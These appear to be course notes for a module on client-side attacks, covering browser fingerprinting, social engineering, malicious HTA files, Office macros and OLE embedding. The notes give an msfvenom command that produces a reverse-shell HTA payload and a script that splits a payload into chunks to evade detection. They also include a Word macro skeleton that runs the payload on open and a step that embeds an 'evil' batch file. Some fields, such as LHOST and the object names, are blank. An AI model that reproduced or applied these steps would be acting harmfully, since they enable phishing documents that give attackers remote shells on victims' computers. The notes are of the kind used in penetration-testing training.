Module 13 (Clint Side Attacks)

Know Your Target (Enum)

  • Passive Enumeration:

    • Identify the victim's browser.

  • Active Enumeration:

    • Social Engineering:

      • Craft messages or scenarios to manipulate users into revealing sensitive information or performing actions.

Leveraging HTML Apps

  • Tool: fingerprintjs2

    • A JavaScript library to uniquely identify a browser based on its features.

  • HTA Attack:

    • Create an HTA (HTML Application) to execute malicious scripts.

      • Example HTA file (file.hta):

        <!DOCTYPE html>
            var x='cmd.exe'
            new ActiveXObject('').Run(x);
            <script> self.close() </script> 
      • Copy the HTA file to a web server:

        sudo cp file.hta /var/www/html/file2.hta
      • Generate an HTA payload with msfvenom:

        sudo msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f hta-psh -o /var/www/html/evil.hta

Exploiting Microsoft Office

  • Word Macro:

    • Split the payload to evade detection.

      str="" # payload from msfvenom
      for i in range(0,len(str),n):
          print "str = Str +" + '"' + str[i:i+n] + '"'
    • Add the split payload to a Word Macro (document.docm).


      Sub AutoOpen()
      End Sub
      Sub Doc_Open()
      End Sub
      Sub test1()
          Dim Str As String
          ' Add the splitted payload here
          CreateObject("").Run Str
      End Sub
  • Object Linking and Embedding (OLE):

    • Create an evil batch file (evil.bat).

    • Create a link object in the Word document (document.docm).


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